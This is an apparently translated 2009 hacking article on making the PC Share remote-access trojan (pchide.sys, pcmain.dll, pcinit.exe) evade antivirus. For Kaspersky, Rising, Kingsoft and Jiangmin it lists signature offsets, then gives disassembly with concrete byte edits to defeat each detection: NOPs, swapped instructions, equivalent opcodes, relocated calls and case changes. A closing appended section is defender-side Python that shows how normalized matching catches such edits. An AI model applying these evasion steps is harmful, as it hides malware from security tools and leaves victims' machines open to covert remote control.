PC Share Signature Locations and How to Modify Them


2009/2/19 0:05:26 Editor: Anonymous Source: compiled by this site

1. Locating the signatures
Kaspersky:
pchide.sys:
[Signature] 00000986_00000001
pcmain.dll:
[Signature] 0000BB02_00000001
pcinit.exe:
[Signature] 00000825_00000001
[Signature] 00001369_00000001

    Rising:
    pchide.sys:
    [Signature] 00000D56_00000001
    pcmain.dll:
    [Signature] 0000BB49_00000001
    pcinit.exe:
    [Signature] 00000673_00000001
    [Signature] 00000827_00000001
    [Signature] 00000D5B_00000001

    Kingsoft:
    pchide.sys:
    [Signature] 00000D3E_00000001
    pcmain.dll:
    Reverse:
    [Signature] 0000BAB4_00000001
    [Signature] 0000BABB_00000001
    [Signature] 0000DE28_00000001
    [Signature] 0000DE79_00000001
    pcinit.exe:
    [Signature] 00001238_00000001
    [Signature] 00001265_00000001

    Jiangmin:
    pchide.sys:
    [Signature] 00000DAF_00000001
    pcmain.dll:
    [Signature] 0000BB0A_00000001
    pcinit.exe:
    [Signature] 000008BC_00000001
    [Signature] 00000EE4_00000001
    [Signature] 000012BA_00000001

    ########################################################################################################################
    2. Modifying the signatures:
    //***********************************************************************************************************************
    Kaspersky:
    pchide.sys:
    [Signature] 00000986_00000001
    00010975:  FF15 20030100              CALL [10320]
    0001097B:  33C0                       XOR EAX,EAX
    0001097D:  EB 11                      JMP SHORT 00010990
    0001097F:  50                         PUSH EAX
    00010980:  33C0                       XOR EAX,EAX       // NOP this out
    00010982:  33C0                       XOR EAX,EAX
    00010984:  0F84 03000000              JE 0001098D
    0001098A:  55                         PUSH EBP
    0001098B:  8211 58                    ADC BYTE PTR [ECX],58
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll
    [Signature] 0000BB02_00000001
    1000BAF9:  EB 4E                      JMP SHORT 1000BB49
    1000BAFB:  57                         PUSH EDI
    1000BAFC:  56                         PUSH ESI
    1000BAFD:  53                         PUSH EBX
    1000BAFE:  E8 FDF8FFFF                CALL 1000B400     // 2. change 1000B400 to: 1000B3F8
    1000BB03:  83FE 01                    CMP ESI,1

    1000B3F8                                                // 1. move the code at 1000B400 to here

    1000B3FE:  90                         NOP
    1000B3FF:  90                         NOP
    1000B400:  8B4424 08                  MOV EAX,[ESP+8]
    1000B404:  81EC 24050000              SUB ESP,524
    1000B40A:  83F8 01                    CMP EAX,1
    1000B40D:  56                         PUSH ESI
    1000B40E:  57                         PUSH EDI
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe
    [Signature] 00000825_00000001  00401425
    0040081D:  FFD6                       CALL NEAR ESI
    0040081F:  6A 06                      PUSH 1            // changed to: push 6 (the bytes shown are after the change)
    00400821:  58                         POP EAX
    00400822:  5F                         POP EDI
    00400823:  5E                         POP ESI
    00400824:  5B                         POP EBX
    00400825:  C9                         LEAVE
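    [Signature] 00001369_00000001  00401F69
    This location is a call instruction; the body of the called function is shown below. Move its first four instructions into an empty area, then change the call target address. Detection bypassed!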

    00401429  /$  55                    push    ebp
    0040142A  |.  8BEC                  mov     ebp, esp
    0040142C  |.  81EC 00010000         sub     esp, 100
    00401432  |.  80A5 00FFFFFF 00      and     byte ptr [ebp-100], 0
    00401439  |.  56                    push    esi
    0040143A  |.  57                    push    edi

    55 8B EC 81 EC 00 01 00 00 80 A5 00 FF FF FF 00

    00401FDB      00                    db      00
    00401FDC      00                    db      00

    //***********************************************************************************************************************
    Rising:
    pchide.sys:
    [Signature] 00000D56_00000001
    00010D4C:  6A 3B                      PUSH 3B
    00010D4E:  59                         POP ECX
    00010D4F:  33C0                       XOR EAX,EAX          //sub eax,eax
    00010D51:  8DBD 02FEFFFF              LEA EDI,[EBP-1FE]
    00010D57:  F3                         REP STOS DWORD PTR ES:[EDI]
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll: (at the start of this section there is a jump to 1000BB49; NOP out the xor eax, eax in the instruction just before it and that is enough...)
    [Signature] 0000BB49_00000001              1000C749
    1000BB3A:  85C0                       TEST EAX,EAX
    1000BB3C:  74 08                      JE SHORT 1000BB46
    1000BB3E:  57                         PUSH EDI
    1000BB3F:  56                         PUSH ESI
    1000BB40:  53                         PUSH EBX
    1000BB41:  FFD0                       CALL EAX
    1000BB43:  8945 0C                    MOV [EBP+C],EAX
    1000BB46:  8B45 0C                    MOV EAX,[EBP+C]
    1000BB49:  5F                         POP EDI
    1000BB4A:  5E                         POP ESI
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe
    [Signature] 00000673_00000001  00401273
    00400664:  56                         PUSH ESI
    00400665:  8B31                       MOV ESI, [DWORD DS:ECX]
    00400667:  57                         PUSH EDI
    00400668:  66:8B7C24 0C               MOV DI, [WORD SS:ESP+C]
    0040066D:  66:893C96                  MOV [WORD DS:ESI+EDX*4], DI
    00400671:  8B31                       MOV ESI, [DWORD DS:ECX]
    00400673:  0FB710                     MOVZX EDX, [WORD DS:EAX]       // swap with the previous line
    00400676:  66:8B7C24 10               MOV DI, [WORD SS:ESP+10]
    [Signature] 00000827_00000001  00401427
    0040081D:  FFD6                       CALL NEAR ESI
    0040081F:  6A 06                      PUSH 6                   // already changed when handling Kaspersky; originally: push 1
    00400821:  58                         POP EAX
    00400822:  5F                         POP EDI
    00400823:  5E                         POP ESI
    00400824:  5B                         POP EBX
    00400825:  C9                         LEAVE
    00400826:  C2 0C00                    RETN C
    [Signature] 00000D5B_00000001  0040195B
    00400D30:  FF15 34204000              CALL NEAR [DWORD DS:402034]
    00400D36:  8BF8                       MOV EDI, EAX
    00400D38:  897D EC                    MOV [DWORD SS:EBP-14], EDI
    00400D3B:  FF15 38204000              CALL NEAR [DWORD DS:402038]
    00400D41:  3D B7000000                CMP EAX, B7
    00400D46:  0F84 E1020000              JE 0040102D
    00400D4C:  68 30750000                PUSH 7530
    00400D51:  57                         PUSH EDI
    00400D52:  FF15 6C204000              CALL NEAR [DWORD DS:40206C]
    00400D58:  85C0                       TEST EAX, EAX              // change to: and eax,eax
    //***********************************************************************************************************************
    Kingsoft:
    pchide.sys:
    [Signature] 00000D3E_00000001
    00010D2A:  73 00                      JNB     SHORT 00010D2C
    00010D2C:  5C                         POP     ESP
    00010D2D:  0000                       ADD     [EAX],AL
    00010D2F:  0055 8B                    ADD     [EBP-75],DL
    00010D32:  EC                         IN      AL,DX
    00010D33:  81EC 18020000              SUB     ESP,218
    00010D39:  56                         PUSH    ESI
    00010D3A:  57                         PUSH    EDI
    00010D3B:  BE 020D0100                MOV     ESI,10D02
    00010D40:  8DBD F0FDFFFF              LEA     EDI,[EBP-210]   // swap with the previous line!
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll:
    Reverse:
    [Signature] 0000BAB4_00000001
    1000BAB3:  55                         PUSH EBP
    1000BAB4:  8BEC                       MOV EBP,ESP  // swap with the next line, then add 4 to the later EBP+8 etc. offsets
    1000BAB6:  53                         PUSH EBX
    1000BAB7:  8B5D 08                    MOV EBX,[EBP+8]
    1000BABA:  56                         PUSH ESI
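    [Signature] 0000BABB_00000001           // already covered by the previous change; the two are together

    [Signature] 0000DE28_00000001              // for these two, simply changing the letter case is enough... (uppercase + 20h = lowercase)
    [Signature] 0000DE79_00000001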
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe:
    [Signature] 00001238_00000001  00401E38
    [Signature] 00001265_00000001  00401E65
    00401259:  8965 E8                    MOV [EBP-18],ESP
    0040125C:  33DB                       XOR EBX,EBX
    0040125E:  895D FC                    MOV [EBP-4],EBX
    00401261:  6A 02                      PUSH 2
    00401263:  FF15 8C204000              CALL [40208C]

    //***********************************************************************************************************************
    Jiangmin:
    pchide.sys:
    [Signature] 00000DAF_00000001
    00010D96:  59                         POP     ECX
    00010D97:  59                         POP     ECX
    00010D98:  8D85 F0FDFFFF              LEA     EAX,[EBP-210]
    00010D9E:  50                         PUSH    EAX
    00010D9F:  8D45 F8                    LEA     EAX,[EBP-8]
    00010DA2:  50                         PUSH    EAX
    00010DA3:  FF15 10030100              CALL    NEAR [10310]
    00010DA9:  68 200F0100                PUSH    10F20
    00010DAE:  8D85 F8FEFFFF              LEA     EAX,[EBP-108]     // swap this line with the line above
    00010DB4:  50                         PUSH    EAX
    //---------------------------------------------------------------------------------------------------------------------
    pcmain.dll:
    [Signature] 0000BB0A_00000001
    1000BAF7:  90                         NOP
    1000BAF8:  90                         NOP
    1000BAF9:  EB 4E                      JMP SHORT 1000BB49
    1000BAFB:  57                         PUSH EDI
    1000BAFC:  56                         PUSH ESI
    1000BAFD:  53                         PUSH EBX
    1000BAFE:  E8 F5F8FFFF                CALL 1000B3F8
    1000BB03:  83FE 01                    CMP ESI,1
    1000BB06:  8945 0C                    MOV [EBP+C],EAX          // swap with the line above!
    1000BB09:  75 0C                      JNZ SHORT 1000BB17
    1000BB0B:  85C0                       TEST EAX,EAX
    1000BB0D:  75 37                      JNZ SHORT 1000BB46
    //---------------------------------------------------------------------------------------------------------------------
    pcinit.exe:
    [Signature] 000008BC_00000001  004014BC

    [Signature] 00000EE4_00000001  00401AE4
    00400EC3:  50                         PUSH EAX
    00400EC4:  8D86 06080000              LEA EAX,[ESI+806]
    00400ECA:  50                         PUSH EAX
    00400ECB:  FFD3                       CALL EBX
    00400ECD:  8D86 06080000              LEA EAX,[ESI+806]
    00400ED3:  68 78304000                PUSH 403078
    00400ED8:  50                         PUSH EAX
    00400ED9:  FFD3                       CALL EBX
    00400EDB:  8D8D 34FEFFFF              LEA ECX,[EBP-1CC]
    00400EE1:  8D86 06090000              LEA EAX,[ESI+906]
    00400EE7:  51                         PUSH ECX
    00400EE8:  50                         PUSH EAX
    [Signature] 000012BA_00000001  00401EBA         // relocate
    00401EB8  |.  59                    pop     ecx
    00401EB9  |>  E8 E2000000           call    00401FA0
    00401EBE  |.  68 0C304000           push    0040300C

    00401FA0  /$  68 00000300           push    30000                                     ; /CWmask = 30000
    00401FA5  |.  68 00000100           push    10000                                     ; |CWnew = 10000
    00401FAA  |.  E8 0D000000           call    <jmp.&MSVCRT._controlfp>                  ; \_controlfp
    00401FAF  |.  59                    pop     ecx
    00401FB0  |.  59                    pop     ecx
    00401FB1  \.  C3                    retn

    68 00 00 03 00 68 00 00 01 00

    00401FF2      68 00000300           push    30000
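
Why the single-location signatures listed above are brittle, and what a scanner can do about it, shown as an added defender-side example (not part of the original article): a byte-exact pattern stops matching once an instruction is swapped for an equivalent encoding or a string changes case, while matching on a normalized form still hits. The signatures, the marker string and the function names are hypothetical; the "before" code bytes come from the pchide.sys and pcinit.exe listings, and the "after" bytes are constructed from the substitutions the page describes.

```python
"""Byte-exact vs. normalized signature matching (added defender-side example)."""

# Interchangeable two-byte encodings, keyed by the canonical form.
# Assumption: the rules are applied to raw bytes; a production engine would
# apply them to decoded instructions so operand bytes are never rewritten.
EQUIVALENT = {
    bytes.fromhex("33C0"): ["31C0", "2BC0", "29C0"],  # xor/sub eax,eax: eax = 0
    bytes.fromhex("85C0"): ["21C0", "23C0"],          # test/and eax,eax: same flags
}


def normalize(data: bytes, fold_case: bool = False) -> bytes:
    """Collapse equivalent encodings; optionally fold ASCII case for strings."""
    for canonical, variants in EQUIVALENT.items():
        for variant in variants:
            data = data.replace(bytes.fromhex(variant), canonical)
    return data.lower() if fold_case else data


def exact_match(signature: bytes, data: bytes) -> bool:
    """Classic single-location signature: the bytes must appear unchanged."""
    return signature in data


def normalized_match(signature: bytes, data: bytes, fold_case: bool = False) -> bool:
    """Match after signature and sample are both reduced to canonical form."""
    return normalize(signature, fold_case) in normalize(data, fold_case)


# "Before" bytes are from the listings above; "after" bytes are constructed.
ZERO_BEFORE = bytes.fromhex("6A 3B 59 33 C0 8D BD 02 FE FF FF F3")
ZERO_AFTER = bytes.fromhex("6A 3B 59 2B C0 8D BD 02 FE FF FF F3")
TEST_BEFORE = bytes.fromhex("FF 15 6C 20 40 00 85 C0")
TEST_AFTER = bytes.fromhex("FF 15 6C 20 40 00 23 C0")
# Constructed string standing in for the two case-changed locations.
TEXT_BEFORE, TEXT_AFTER = b"\x00EXAMPLE_MARKER\x00", b"\x00example_marker\x00"

# Hypothetical signatures, each anchored on the bytes that get edited.
SIG_ZERO = bytes.fromhex("59 33 C0 8D BD")
SIG_TEST = bytes.fromhex("6C 20 40 00 85 C0")
SIG_TEXT = b"EXAMPLE_MARKER"

if __name__ == "__main__":
    for name, sig, after, fold in [("zero", SIG_ZERO, ZERO_AFTER, False),
                                   ("test", SIG_TEST, TEST_AFTER, False),
                                   ("text", SIG_TEXT, TEXT_AFTER, True)]:
        print(name, exact_match(sig, after), normalized_match(sig, after, fold))
```

Instruction reordering and code relocation, the other edits on this page, are not covered by byte normalization and call for matching on decoded instruction sequences or on behaviour.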
